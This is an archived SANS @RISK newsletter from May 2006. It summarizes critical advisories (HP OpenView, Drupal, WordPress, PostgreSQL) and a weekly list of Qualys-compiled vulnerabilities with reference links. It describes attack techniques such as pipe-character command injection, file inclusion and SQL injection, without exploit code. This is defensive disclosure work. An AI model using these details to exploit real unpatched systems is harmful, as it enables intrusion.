Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 21
May 29, 2006

SANS Newsletters Home

HP OpenView and Symantec Antivirus users should update their software quickly.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Third Party Windows Apps
    • 6
    • Mac OS
    • 1
    • Linux
    • 4
    • HP-UX
    • 2
    • Unix
    • 3
    • Cross Platform
    • 9 (#1, #2, #3, #6)
    • Web Application - Cross Site Scripting
    • 7
    • Web Application - SQL Injection
    • 3
    • Web Application
    • 23 (#4, #5)

***************** Sponsored By Blue Coat Systems, Inc. *****************

New eBook: SSL VPN Lessons Learned

Learn how to get the most out of SSL VPNs. Honest, technical, and to- the-point, this eBooklet, by analyst Don Jones, discusses what SSL VPNs promised, how they originally failed to deliver, and why the technology is making comeback. He'll answer your questions, explains the technology, and set you on the path to success. Learn more.

http://www.sans.org/info.php?id=1176

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Third Party Windows Apps
Mac Os
Linux
HP-UX
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application

*************************************************************************

SECURITY TRAINING UPDATE FOR JUNE and JULY, 2006

Washington DC: 18 tracks

Denver: 6 tracks

London: 5 tracks

Toronto: 4 tracks

Plus 10 other cities and live-online programs you can take from your home.

See http://www.sans.org/ for course schedule registration

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/index.php#process

Widely Deployed Software
  • (1) CRITICAL: HP OpenView Multiple Remote Command Execution
  • Affected: HP OpenView Storage Data Protector Versions 5.1 and 5.5
    • HP OpenView Network Node Manager Versions 6.20, 6.4x, 7.01, and 7.50

  • Description: HP OpenView, a popular enterprise system management and monitoring solution, is vulnerable to several undisclosed remote command execution vulnerabilities due to improperly-validated input. Both the Network Node Manager (system monitoring and management) and Storage Data Protector (backup and data management) products are affected. Users are advised to block access to these systems from the Internet and other untrusted hosts. Note that these products often run with privileged access.

  • Status: HP confirmed, patches released.

  • Council Site Actions: The responding council sites using the affected software have notified their respective support teams and plan to deploy the patches during their next regularly scheduled system update. They also block OpenView access at their network security perimeters.

  • References:
  • (3) MODERATE: FreeType Font File Handling Integer Overflow
  • Affected: FreeType version 2.2 and prior

  • Description: FreeType is an Open Source font engine widely deployed with Linux and Unix-based operating systems. Versions 2.2 and prior are vulnerable to several integer overflows when processing specially-crafted font files. By tricking a user into accessing such a font file, an attacker could execute remote code with the privileges of the vulnerable user. Note that, based on configuration, no user interaction beyond downloading the file may be necessary. Users are advised to not open any font files from untrusted sources and to upgrade to the latest version of the affected software.

  • Status: FreeType confirmed. Updates available.

  • Council Site Actions: One of the reporting council sites has the affected software installed on several hundred Linux systems. Most of their Debian GNU/Linux systems already have the new version (i.e., version 2.2.1-2 of the freetype package). They are awaiting release of a Red Hat Enterprise Linux patch.

  • References:
  • (4) MODERATE: Drupal Arbitrary Remote File Execution
  • Affected: Drupal versions 4.6.7, 4.7.0 and prior.

  • Description: Drupal is a popular and widely-deployed Open Source content management application. Under a typical configuration of Drupal with Apache, Drupal is vulnerable to an arbitrary file execution vulnerability. By sending a specially-crafted request, an attacker is able to instruct Drupal to execute a file located in the "files" directory. Drupal is commonly configured to allow remote users to upload files, and an attacker can therefore inject code via an uploaded file. Users are encouraged to disable file uploading and update to the latest version of the affected software. Note that technical details and a proof-of-concept have been publicly posted.

  • Status: Drupal confirmed, updates released.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites.

  • References:
  • (5) MODERATE: WordPress Remote Command Execution
  • Affected: WordPress version 2.0.2 and prior.

  • Description: WordPress is a popular blogging and content management system written in PHP. Versions 2.0.2 and prior are vulnerable to a remote command execution vulnerability and an IP spoofing attack. By sending a specially-crafted request to the server hosting WordPress, an attacker could cause the server to execute arbitrary commands with the privilege of the webserver process. Note that only servers that allow open user registration or open account information modification are vulnerable to this vulnerability. Note that, due to a flaw in the processing of client request headers, it is also possible to spoof the source IP of the attacker in the WordPress logs. However, the hosting webserver logs should remain unaffected. Note that technical details and a proof-of-concept are available for the remote code execution vulnerability. Users are advised to disallow anonymous user registration.

  • Status: WordPress has not confirmed, no updates are available.

  • References:
  • (6) LOW: PostgreSQL Multibyte Encoding Security Bypass and SQL Injection
  • Affected: PostgreSQL versions 8.1.4, 8.0.8, 7.4.13, 7.3.15 and prior.

  • Description: PostgreSQL is an extremely popular and widely-deployed Open Source SQL database system. It also forms the basis of several other widely-deployed database engines, including RedHat's RedHat Database. The server suffers from a potential SQL injection and security bypass vulnerability due to a failure to properly validate multibyte character encodings when interacting with non-encoding-aware client-side applications. Specifically, when used with applications that treat multibyte characters as single characters, an attacker can submit specially-crafted multibyte strings to the server, which will interpret them as valid SQL commands. Note that most client applications are not encoding-aware and are therefore open to this vulnerability. Injected SQL commands will be run with the privileges of the client application on the server. Technical details for this vulnerability have been posted and simple proofs-of-concept are available.

  • Status: PostgreSQL confirmed, updates available.

  • Council Site Actions: At the reporting council sites the affected application is not used for any central IT services. The sites are still assessing whether their deployed configurations have a chance of exploitation.

  • References:
Other Software
  • (7) UPDATE: Metasploit 2.6 Released

  • Description: Metasploit is a popular Open Source platform for developing and deploying security exploits. Version 2.6 of this platform has been released, and contains 143 exploits, 43 new since the last release. Many of these exploits are for still-current vulnerabilities.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 21, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5014 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 06.21.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: EMC Retrospect Client Buffer Overflow
  • Description: Retrospect is a backup management application for enterprise networks. Retrospect Client for Windows is prone to a remote buffer overflow vulnerability. The problem presents itself when malicious data is sent to the listening port of the client application. Retrospect version 7.5 Client for Windows is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/18072
  • 06.21.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: BitZipper Remote Directory Traversal
  • Description: BitZipper is a file-archiving and compression application. It is affected by a directory traversal issue when it processes malicious TAR, ZIP, TAR.GZ, GZ or JAR archives. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18065
  • 06.21.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Skype Technologies Skype URI Handling Remote File Download
  • Description: Skype from Skype Technologies is peer-to-peer communications software that provides for Internet-based voice communications. Skype is prone to an arbitrary file download vulnerability. This issue is due to improper Skype URI handling. This issue is triggered by specially crafted, malformed Skype URIs. If an unsuspecting user follows these URIs, Skype will be launched, and an attacker-specified file will automatically be downloaded from the victim user's computer to the attacker. This issue allows remote attackers to transfer files from one Skype user to another, provided the recipient user has previously approved downloads.
  • Ref: http://www.skype.com/security/skype-sb-2006-001.html
  • 06.21.4 - CVE: CVE-2006-2494
  • Platform: Third Party Windows Apps
  • Title: IntelliTamper Map Files Buffer Overflow
  • Description: IntelliTamper is an application for scanning web sites. It is vulnerable to a buffer overflow issue when a malicious site map file ".map" with an overly long line is opened. IntelliTamper version 2.07 is vulnerable.
  • Ref: http://www.milw0rm.com/exploits/1806
  • 06.21.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Cisco VPN Client Local Privilege Escalation
  • Description: Cisco VPN Client is a virtual private network (VPN) client application. It is vulnerable to a local privilege escalation issue due to an unspecified flaw in the VPN client dialer application. Cisco VPN Client versions earlier than 4.8.01.x on Microsoft Windows are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434934
  • 06.21.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Symantec Antivirus Remote Unspecified Code Execution
  • Description: Symantec Antivirus is susceptible to an unspecified remote code execution issue which allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges. Symantec Antivirus version 10 is affected.
  • Ref: http://www.securityfocus.com/bid/18107
  • 06.21.7 - CVE: Not Available
  • Platform: Mac Os
  • Title: Apple Xcode Tools WebObjects Unauthorized Remote Access
  • Description: Xcode Tools is prone to an unauthorized remote access vulnerability through the WebObjects plug-in. By design the WebObjects plug-in provides the ability to manipulate projects through a network service. However, the service is accessible by remote users when Xcode is running. This issue only affects systems with the Xcode Tools WebObjects plug-in installed.
  • Ref: http://www.securityfocus.com/bid/18091
  • 06.21.8 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel SNMP NAT Helper Remote Denial of Service
  • Description: The Linux SNMP NAT helper is susceptible to a remote denial of service vulnerability. This issue arises in the "snmp_trap_decode()" function when certain SNMP packets are processed. Specifically, the application improperly frees memory under various circumstances and crashes when the "ip_nat_snmp_basic" module is loaded and NAT is enabled on TCP ports 161 or 162. Kernel versions prior to 2.6.16.18 are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/18089/references
  • 06.21.9 - CVE: CVE-2006-1858,CVE-2006-1857
  • Platform: Linux
  • Title: Linux Kernel SCTP Multiple Remote Denial of Service Vulnerabilities
  • Description: The Linux kernel SCTP module is vulnerable to multiple remote denial of service issues when the kernel handles unexpected SCTP packets. The Linux kernel versions 2.6.16 and earlier are vulnerable.
  • Ref: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.17
  • 06.21.10 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel Choose_New_Parent Local Denial of Service
  • Description: The Linux kernel is prone to a local denial of service vulnerability. This issue is due to a design error in the "choose_new_parent" function. This vulnerability allows local users to cause a kernel panic, denying further service to legitimate users. This issue affects Linux kernel versions prior to 2.6.11.12.
  • Ref: http://www.securityfocus.com/bid/18099
  • 06.21.11 - CVE: CVE-2006-1528
  • Platform: Linux
  • Title: Linux Kernel SG Driver Direct IO Local Denial of Service
  • Description: The Linux kernel is prone to a local denial of service vulnerability. This issue is due to a design error in the SG driver. This issue presents itself when direct IO mixed with memory-mapped files is performed on SG devices. This causes a kernel panic due to unexpectedly empty entries in the scatter-gather list. This issue affects Linux kernel versions prior to 2.6.13.
  • Ref: http://marc.theaimsgroup.com/?l=linux-scsi&m=112540053711489&w=2
  • 06.21.12 - CVE: Not Available
  • Platform: HP-UX
  • Title: HP-UX Kernel Unspecified Local Denial of Service
  • Description: The HP-UX kernel is prone to an unspecified local denial of service vulnerability. The vendor has reported a local authorized user can cause denial of service conditions in the kernel.
  • Ref: http://www.securityfocus.com/bid/18057
  • 06.21.13 - CVE: Not Available
  • Platform: HP-UX
  • Title: HP-UX Software Distributor Unspecified Local Privilege Escalation
  • Description: HP-UX Software Distributor is susceptible to an unspecified local privilege escalation vulnerability. This issue allows local attackers to gain administrative privileges on affected computers.
  • Ref: http://www.securityfocus.com/bid/18098
  • 06.21.14 - CVE: Not Available
  • Platform: Unix
  • Title: Prodder Arbitrary Shell Command Execution
  • Description: Prodder is a perl podcatcher script. It automates downloading RSS2 enclosures. Prodder is prone to an arbitrary command execution vulnerability. This issue occurs when the application extracts the URL of an audio file from the XML file a server provides.
  • Ref: http://www.redteam-pentesting.de/advisories/rt-sa-2006-002.txt
  • 06.21.15 - CVE: Not Available
  • Platform: Unix
  • Title: KPhone Local Information Disclosure
  • Description: KPhone is a voice-over-internet phone implementation. The "kphonerc" configuration file is created with world-readable permission which contains SIP phone passwords and configuration information. KPhone version 4.2 is affected.
  • Ref: http://www.securityfocus.com/bid/18049
  • 06.21.16 - CVE: CVE-2006-2502
  • Platform: Unix
  • Title: Cyrus IMAPD POP3D Remote Buffer Overflow
  • Description: Cyrus IMAPD is an open-source Interactive Mail Access Protocol (IMAP) daemon. It is vulnerable to a remote buffer overflow issue due to insufficient sanitization of POP3D USER commands. Cyrus IMAPD version 2.3.2 is vulnerable.
  • Ref: http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
  • 06.21.17 - CVE: CVE-2006-2550, CVE-2006-2548
  • Platform: Cross Platform
  • Title: Perlpodder Arbitrary Shell Command Execution
  • Description: Perlpodder is a perl podcatcher script. It automates downloading RSS2 enclosures. It is prone to an arbitrary command execution vulnerability. This issue occurs when the application extracts the URL of an audio file from the XML file a server provides. The application does not properly sanitize the data before using it in a system() command. Perlpodder version 0.4 is affected.
  • Ref: http://www.securityfocus.com/bid/18067
  • 06.21.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Nested Array Objects Denial of Service
  • Description: The Sun Java Runtime Environment is vulnerable to a denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when dealing with nested array objects. This issue is reported to affect Java Runtime Environment versions up to 1.4.2_11 and 1.5.0_06. This issue will crash Internet browsers running an affected Java plug-in.
  • Ref: http://www.securityfocus.com/bid/18058
  • 06.21.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Browsers Exception Handling Information Disclosure
  • Description: Multiple browsers are prone to an information disclosure vulnerability. The problem occurs during exception handling in "nsSidebar.js" when viewing malformed pages. When an exception occurs the data sent to the server includes the full installation directory of the client application. Please visit the referenced link for more details.
  • Ref: http://www.securityfocus.com/bid/18083
  • 06.21.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Dia Filename Remote Format String
  • Description: Dia is a gtk-based program for creating diagrams. Insufficient sanitization in the "gtk_message_dialog_new()" function of the "lib/message.c" file exposes it to a remote format string issue. Dia versions 0.95 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18078
  • 06.21.21 - CVE: CVE-2006-2539
  • Platform: Cross Platform
  • Title: Sybase EAServer J2EE Application Clients and Java GUI Applications Password Disclosure
  • Description: Sybase EAServer is an open application server for hosting business applications. Sybase EAServer may expose passwords through GUI applications. A local user could exploit this vulnerability to view another user's password. The problem occurs because the "get_SelectedText()" method of "javax.swing.JPasswordField" UI component returns cleartext passwords. An attacker can exploit this issue to retrieve the contents of a password field in a currently open GUI dialog box or to retrieve the contents of a local file (if the component is used to store passwords in that file). EAServer versions 5.0, 5.2 and 5.3 are vulnerable to this issue.
  • Ref: http://www.sybase.com/detail?id=1040665
  • 06.21.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: CScope Include Filename Buffer Overflow
  • Description: Cscope is a free C source code browsing and analysis tool. It is prone to a buffer overflow vulnerability. The overflow occurs when the application is used to scan a C file with an overly long "#include" directive.
  • Ref: http://www.securityfocus.com/bid/18050
  • 06.21.23 - CVE: CVE-2006-2314, CVE-2006-2313
  • Platform: Cross Platform
  • Title: PostgreSQL Multibyte Character Encoding SQL Injection Vulnerabilities
  • Description: PostgreSQL is an open-source relational database suite. PostgreSQL is prone to SQL injection vulnerabilities. These issues are due to a potential mismatch of multibyte-character conversions between PostgreSQL servers and client applications. Attackers may exploit the first issue by including invalid multibyte characters to bypass standard string-escape methods. Attackers can exploit the second issue in certain circumstances when database-using applications use the non-standard "" character to escape the single quote character, rather than the SQL standards compliant "'" escaping method. PostgreSQL versions prior to 7.3.15, 7.4.13, 8.0.8, and 8.1.4 are vulnerable to these issues.
  • Ref: http://www.postgresql.org/docs/techdocs.50
  • 06.21.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HP OpenView Storage Data Protector Remote Arbitrary Command Execution
  • Description: HP OpenView Storage Data Protector is a data management product for backup and recovery operations. It is affected by a remote command execution issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18095
  • 06.21.25 - CVE: CVE-2006-2575
  • Platform: Cross Platform
  • Title: NetPanzer SETFRAME Remote Denial of Service
  • Description: NetPanzer is an online multiplayer tactical warfare game. NetPanzer is affected by a remote denial of service vulnerability. NetPanzer 0.8 (rev 952) and prior versions are affected by this issue.
  • Ref: http://www.securityfocus.com/archive/1/434908
  • 06.21.26 - CVE: CVE-2006-2518
  • Platform: Web Application - Cross Site Scripting
  • Title: PHPWCMS CNT6.INC.PHP Cross-Site Scripting
  • Description: PHPWCMS is a web-based content management application implemented in PHP. It is prone to a cross-site scripting vulnerability. This issue affects version 1.2.5-DEV.
  • Ref: http://www.kapda.ir/advisory-331.html
  • 06.21.27 - CVE: CVE-2006-0222
  • Platform: Web Application - Cross Site Scripting
  • Title: AlstraSoft E-Friends Multiple HTML Injection Vulnerabilities
  • Description: E-Friends is a web-based social networking application implemented in PHP. It is prone to multiple HTML injection vulnerabilities. All versions are considered to be vulnerable at the moment.
  • Ref: http://www.securityfocus.com/archive/1/434846
  • 06.21.28 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Hscripts HGB Index.PHP Cross-Site Scripting
  • Description: Hscripts HGB is a web-based guestbook application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to various scripts. Hscripts HGB version 3.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434686
  • 06.21.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Captivate Gallery.PHP Cross-Site Scripting
  • Description: Captivate is a web-based gallery application. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "page" parameter of the "gallery.php" script. This issue affects version 1.0.
  • Ref: http://www.securityfocus.com/bid/18072
  • 06.21.30 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Another Image Gallery Cross-Site Scripting
  • Description: Another Image Gallery is affected by a cross-site scripting issue due to insufficient sanitization of the "alt" and "columns" parameters of the "gallery.php" script. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18073
  • 06.21.31 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: phpRaid View.PHP Cross-Site Scripting
  • Description: phpRaid is a raid-management system for the game World of Warcraft; it is implemented in PHP. phpRaid is prone to a cross-site scripting vulnerability. This issue affects phpRaid version 2.9.5.
  • Ref: http://www.securityfocus.com/archive/1/434736
  • 06.21.32 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DSChat HTML Injection
  • Description: DSChat is a web-based chat application implemented in PHP. DSChat is prone to an HTML injection vulnerability.
  • Ref: http://www.securityfocus.com/archive/1/434821
  • 06.21.33 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Links.PHP SQL Injection
  • Description: Woltlab Burning Board is web-based bulletin-board package. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "cat" parameter of the "links.php" script. Woltlab Burning Board versions 2.3.4 and earlier are vulnerable.
  • Ref: http://www.milw0rm.com/exploits/1810
  • 06.21.34 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: JemWeb DownloadControl DC.PHP SQL Injection
  • Description: DownloadControl is a web-based download manager. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "dcid" parameter of the "dc.php" script. DownloadControl version 1.0 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/18041
  • 06.21.35 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ZixForum Settings.ASP SQL Injection
  • Description: ZixForum is a web-log application. Insufficient sanitization of the "layid" parameter of the "settings.asp" script exposes the application to an SQL injection issue. ZixForum version 1.12 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18043
  • 06.21.36 - CVE: Not Available
  • Platform: Web Application
  • Title: Nagios Remote Content-Length Integer Overflow
  • Description: Nagios is an open-source application designed to monitor networks and services. It is affected by a integer overflow issue due to insufficient snaitization of the "Content-Length" HTTP request headers. Nagios versions prior to 2.3.1 are affected.
  • Ref: http://www.securityfocus.com/bid/18059
  • 06.21.37 - CVE: CVE-2006-2498
  • Platform: Web Application
  • Title: Power Place PHP Easy Galerie Index.PHP Remote File Include
  • Description: PHP Easy Galerie is a web-based gallery application implemented in PHP. It is prone to a remote file include vulnerability. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/434695
  • 06.21.38 - CVE: CVE-2006-2516
  • Platform: Web Application
  • Title: XOOPS Mainfile.PHP Local File Include
  • Description: XOOPS is an extensible, dynamic web content management system. It is vulnerable to a local file include issue due to the "xoopsOption['nocommon']" parameter is not properly checked for the presence of directory-traversal sequences. XOOPS versions 2.0.13.2 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434698
  • 06.21.39 - CVE: Not Available
  • Platform: Web Application
  • Title: phpwcms Spaw_Control.Class.PHP Local File Include
  • Description: phpwcms is a web-based content management application. Insufficient sanitization of the "../" directory traversal sequence in the "spaw_root" parameter of the "spaw_control.class.php" file exposes the application to a local file include issue. phpwcms version 1.2.5-DEV is affected.
  • Ref: http://www.securityfocus.com/bid/18062
  • 06.21.40 - CVE: Not Available
  • Platform: Web Application
  • Title: Chatty Username HTML Injection
  • Description: Chatty is a web based-chat application. It is exposed to a HTML injcetion issue due to insufficient sanitization of user-supplied input. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18082
  • 06.21.41 - CVE: Not Available
  • Platform: Web Application
  • Title: Destiney Rated Images Addweblog.PHP HTML Injection
  • Description: Destiney Rated Images is a gallery script. Insufficient sanitization of user-supplied input to the "addweblog.php" and "leavecomments.php" script exposes the application to a HTML injection issue. Destiney Rated Images Version 0.5.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18070
  • 06.21.42 - CVE: CVE-2006-2536
  • Platform: Web Application
  • Title: Destiney Links Script Multiple HTML Injection Vulnerabilities
  • Description: Destiney Links Script is a PHP application for monitoring and managing remote links. Destiney Links Script is prone to multiple HTML injection vulnerabilities. These issues affect version 2.1.2.
  • Ref: http://www.securityfocus.com/archive/1/434692
  • 06.21.43 - CVE: Not Available
  • Platform: Web Application
  • Title: UBB.threads Addpost_newpoll.PHP Remote File Include
  • Description: UBB.threads is a web-based forum application. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "thispath" variable of "addpost_newpoll.php". UBB.threads versions 6.5.2 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18075
  • 06.21.44 - CVE: CVE-2006-2570
  • Platform: Web Application
  • Title: CaLogic Calendars Multiple Remote File Include Vulnerabilities
  • Description: CaLogic Calendars is a web-based calendar application written in PHP. CaLogic Calendars is prone to multiple remote file include vulnerabilities. CaLogic Calendars 1.2.2 is reported to be vulnerable.
  • Ref: http://www.milw0rm.com/exploits/1809
  • 06.21.45 - CVE: Not Available
  • Platform: Web Application
  • Title: YourFreeWorld Stylish Text Ads Script Multiple HTML Injection Vulnerabilities
  • Description: Stylish Text Ads Script is a PHP application for selling and distributing web-based ads. It is prone to multiple HTML injection vulnerabilities due to insufficient sanitization of user-supplied input to the "advertise.php" script.
  • Ref: http://www.securityfocus.com/bid/18044
  • 06.21.46 - CVE: Not Available
  • Platform: Web Application
  • Title: Artmedic Newsletter Log.PHP Remote Script Execution
  • Description: Artmedic Newsletter is a web-based newsletter application. It is vulnerable to a remote PHP code execution issue due to insufficient sanitization of user-supplied input to the "email" and "logfile" parameters. Artmedic Newsletter version 4.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434738
  • 06.21.47 - CVE: Not Available
  • Platform: Web Application
  • Title: YourFreeWorld Short Url & Url Tracker Script Multiple HTML Injection Vulnerabilities
  • Description: Short Url & Url Tracker Script is an ASP application for managing and acquiring short URLs. Short Url & Url Tracker Script is prone to multiple HTML injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
  • Ref: http://www.securityfocus.com/archive/1/434530
  • 06.21.48 - CVE: Not Available
  • Platform: Web Application
  • Title: phpBazar Classified_right.PHP Remote File Include
  • Description: phpBazar is a web-based classified ad and match-making application implemented in PHP. Insufficient sanitization of the "language_dir" parameter of the "classified_right.php" script exposes the application to a remote file include issue.
  • Ref: http://www.securityfocus.com/bid/18052
  • 06.21.49 - CVE: Not Available
  • Platform: Web Application
  • Title: phpBazar Admin.PHP Unauthorized Access
  • Description: phpBazar is a web-based classified ad and match making application. It is prone to an unauthorized access vulnerability due to insufficient sanitization of user-supplied credentials before granting access to sensitive scripts.
  • Ref: http://www.securityfocus.com/bid/18053
  • 06.21.50 - CVE: CVE-2006-2545, CVE-2006-2544, CVE-2006-2543
  • Platform: Web Application
  • Title: Xtreme Topsites Multiple Input Validation Vulnerabilities
  • Description: Xtreme Topsites is a top sites script implemented in PHP. Xtreme Topsites is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/434568
  • 06.21.51 - CVE: Not Available
  • Platform: Web Application
  • Title: ipLogger Useragent HTML Injection
  • Description: ipLogger is a web-based application to gather information on the IP, referer and browser. Insufficient sanitization of the "useragent" parameter exposes the application to a HTML injection issue. ipLogger version 1.7 is affected.
  • Ref: http://www.securityfocus.com/bid/18086
  • 06.21.52 - CVE: CVE-2006-2537
  • Platform: Web Application
  • Title: Beats Of Rage Multiple Format String Vulnerabilities
  • Description: Beats Of Rage (BOR) is an open source beat'em up engine available for multiple platforms. OpenBOR and Horizontal Shooter BOR are variants of that engine. Beats of Rage is prone to multiple remote format string vulnerabilities. This issue arises when the application handles specially crafted files. A successful attack may crash the application or lead to arbitrary code execution.
  • Ref: http://aluigi.altervista.org/adv/borfs-adv.txt
  • 06.21.53 - CVE: Not Available
  • Platform: Web Application
  • Title: Russcom PHPImages Arbitrary File Upload
  • Description: Russcom PHPImages is a web-based gallery script. It is prone to an arbitrary file upload vulnerability because the script only checks the file extension of uploaded files, and not the contents. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process.
  • Ref: http://www.securityfocus.com/bid/18089
  • 06.21.54 - CVE: Not Available
  • Platform: Web Application
  • Title: Russcom Ping Remote Arbitrary Command Execution
  • Description: Russcom Ping is a web-based ping script. A specially crafted request can be used to inject arbitrary commands into the "system()" function through use of pipe "|" characters causing a command execution issue.
  • Ref: http://www.securityfocus.com/bid/18090
  • 06.21.55 - CVE: Not Available
  • Platform: Web Application
  • Title: HP OpenView Network Node Manager Multiple Remote Vulnerabilities
  • Description: HP OpenView Network Node Manager is a fault management application for IP networks. It is prone to multiple remote vulnerabilities. Remote, unauthorized privileged access, arbitrary command execution, and arbitrary file creation vulnerabilities affect Network Node Manager. Attackers may exploit these issues to execute arbitrary commands in the context of the affected process, create arbitrary files, or to gain privileged access.
  • Ref: http://www.openview.hp.com/products/nnm/
  • 06.21.56 - CVE: Not Available
  • Platform: Web Application
  • Title: Nucleus CMS GLOBALS[DIR_LIBS] Parameter Remote File Include
  • Description: Nucleus CMS is a web-based content management system. It is affected by a remote file include issue due to insufficient sanitization of the "GLOBALS[DIR_LIBS]" variable of the "nucleus/libs/PLUGINADMIN.php" script.
  • Ref: http://www.securityfocus.com/bid/18097
  • 06.21.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Elite-Board Search Page HTML Injection
  • Description: Elite-Board is a web-based bulletin board application. Insufficient sanitization of user-supplied input exposes the application to a HTML injection issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18103
  • 06.21.58 - CVE: CVE-2006-2587
  • Platform: Web Application
  • Title: PunkBuster WebTool WebKey Parameter Remote Buffer Overflow
  • Description: PunkBuster is an anti-cheat system used in many popular games. It can boot players who try to bypass certain restrictions. WebTool is an HTTP server supplied with the application. PunkBuster WebTool is prone to a remote buffer overflow vulnerability. A remote unauthenticated attacker can trigger this issue through an HTTP GET or POST request. PunkBuster versions prior to 1.229 are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/archive/1/434909

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

This course, on the first day, made clear several topics that I had questions on for years. The explanations provided were unlike other information contained on websites and in books
-M. Cook, Arrowhead International

SANS Pen Test Hackfest 2013 - Washington

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"This has been a great way to get working knowledge that would have taken years of experience to learn."
- Josh Carlson, Nelnet

"SANS is far more in-depth than other training I have attended."
- Frank Rajnai, Sears Canada Inc

"Expertise of the trainer is impressive, real life situations explained, very good manuals. Best training ever!"
- Jerry Robles de Medina, Godo CU